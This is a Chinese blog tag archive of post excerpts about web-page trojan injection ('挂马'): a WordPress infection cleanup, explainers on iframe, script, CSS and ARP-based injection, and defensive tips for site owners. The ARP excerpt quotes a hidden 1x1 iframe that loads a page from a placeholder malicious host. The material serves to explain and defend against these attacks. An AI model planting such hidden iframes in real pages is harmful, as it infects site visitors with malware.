标签存档: 挂马

小杯具了,wordpress居然被挂马了/清理过程兼木马解剖简记

今天真的载了,居然wordpress也被挂马了,太不可思议了。
事情如下:
晚上发篇文章,突然想到了一个对wordpress进行改进的方案,图片/附件与web分离,当然这个需求可能极少见,因为大多数wordpress都不会遇到这样的问题:空间不够用(直接升级主机了)、对附件的下载打开严重影响到web (如html,css,js)的访问速度。
但进入后台,看到快速发文章的内容框里很怪异,默认就有下面的一段文字,js代码,下面的最近草稿也显示有类似的js代码,心下不好,可能是被挂马了。不过还好,前几天为了试用新买vps性能,把整个wordpress数据库备份了一份,看来还真是所幸。
阅读全文——共6438字

网页IFRAME框架挂马的原理与防范/网页挂马木马

当前网络安全最大的危险是什么?很多人都会说是网页挂马。没错!为了大规模盗号,挂马的网页在去年数以千万计的增长。普通网民知道怎么在电脑中防范网页挂
马就可以了,从事和想从事与网络安全相关工作的朋友就要多掌握一些知识,知道网页挂马到底是怎么进行的,有哪几种方式。知己知彼,就会更好地维护网吧、网
站等,就会增加自己的安全技能,逐渐成长为一名安全工程师。
  一名优秀的安全工程师,要能独立负责网站安全、局域网安全、服务器安全等,要了解网页挂马有IFRAME框架挂马、JS文件挂马、伪装挂马、CSS挂马、ActiveX组件挂马等方式,这样才可以有针对性地进行防范,避免网站和服务器等安全威胁。下面,我们来迈出成长为安全工程师的第一步,掌握IFRAME框架挂马的底细以及相应的防范方法。  
阅读全文——共1379字

ARP挂马,某些网站被挂马的真正原因

现象:访问服务器上的任何网页,就连404的页面也会在后加入:
   <iframe src=”http://www.aaaa.com/a.htm” frameborder=”0″ height=”1″ width=”1″></iframe>通过ftp查看但这些页面(指静态HTML文件)里面并没有这样的代码,但浏览器访问就会出现。如果发生这种情况,可以肯定,是服务器中了ARP木马,不是web程序的问题
什么是ARP
   地址解析协议(Address Resolution Protocol,ARP)是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用,其主要用作将IP地址翻译为以太网的 MAC地址,但其也能在ATM和FDDIIP网络中使用。从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。ARP具体说来就是将网络层(IP层,也就是相当于OSI的第三层)地址解析为数据连接层(MAC层,也就是相当于OSI的第二层)的MAC地址。
阅读全文——共4047字

各种网页挂马方式原理揭密/iframe挂马,script 挂马,图片伪装挂马等

现在,网站经常被各种网页挂马,为了保障大家网站的安全和互联网用户的安全,有必要对网页挂马有所了解。
查了一些资料,由于存在大量的黑客软件,一个菜鸟只需几分钟就可以编写一个木马网页,对别人的网站进行挂马了。 下面介绍集中常见的网页挂马方式:
(1)iframe 框架挂马

阅读全文——共3096字

网站被挂马防范措施及十大有效的解决方法

本来草根站长做个站不容易,奈何某些前辈不自重,还来难为咱们,为了他们的一己私欲,牺牲了我们的站点不说,关键是打击了咱们的建站激情,我就我所知道的给一些新手站长写点防范和解决之道。高手可以一笑带过,有不对的地方敬请指正!
第一,免费的网站论坛什么的,就不要作为自己的主要精力投入点了,因为即使被挂马或者被删除,他们也不用负什么责任;免费空间也一样;
第二,程序的选择请尽量选择一些口碑比较好的,比较有名的程序,当然不是说他们不会有安全漏洞,相对来说,他们的漏洞少得多,而且修补很即时;
第三,现在的程序一般都有验证码,安全问题等功能,建议打开,特别是对于管理员来说,一定要,后台登录页面的名字,建议更改下,改成自己记得住但不是默认管理页面的名字;顺便提下,install目录一定要删除,很多程序都有这个提示的;
阅读全文——共1255字

网页挂马的来龙去脉/原理实现手段 防范对策

很多朋友都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到木马病毒。有经验的朋友会知道这是网页恶意代码,但是 自己打开的明明是正规网站,没有哪家正规网站会将病毒放在自己的网页上吧?那么是什么导致了这种现象的发生呢?其中最有可能的一个原因就是:这个网站被挂 马了。
“挂马”这个词目前我们似乎经常能听到,那么什么是挂马呢?挂马就是黑客入侵了一些网站后,将自己编写的网页木马嵌入被黑网站 的主页中,利用被黑网站的流量将自己的网页木马传播开去,以达到自己不可告人的目的。例如很多游戏网站被挂马,黑客的目的就是盗取浏览该网站玩家的游戏账 号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱, 沦为黑客的肉鸡。下面就让我们来了解这种时下最流行的黑客攻击手段。
阅读全文——共2957字

网页后门与网页挂马原理揭密

网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业 的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。
一、前置知识
网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行 某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
阅读全文——共4254字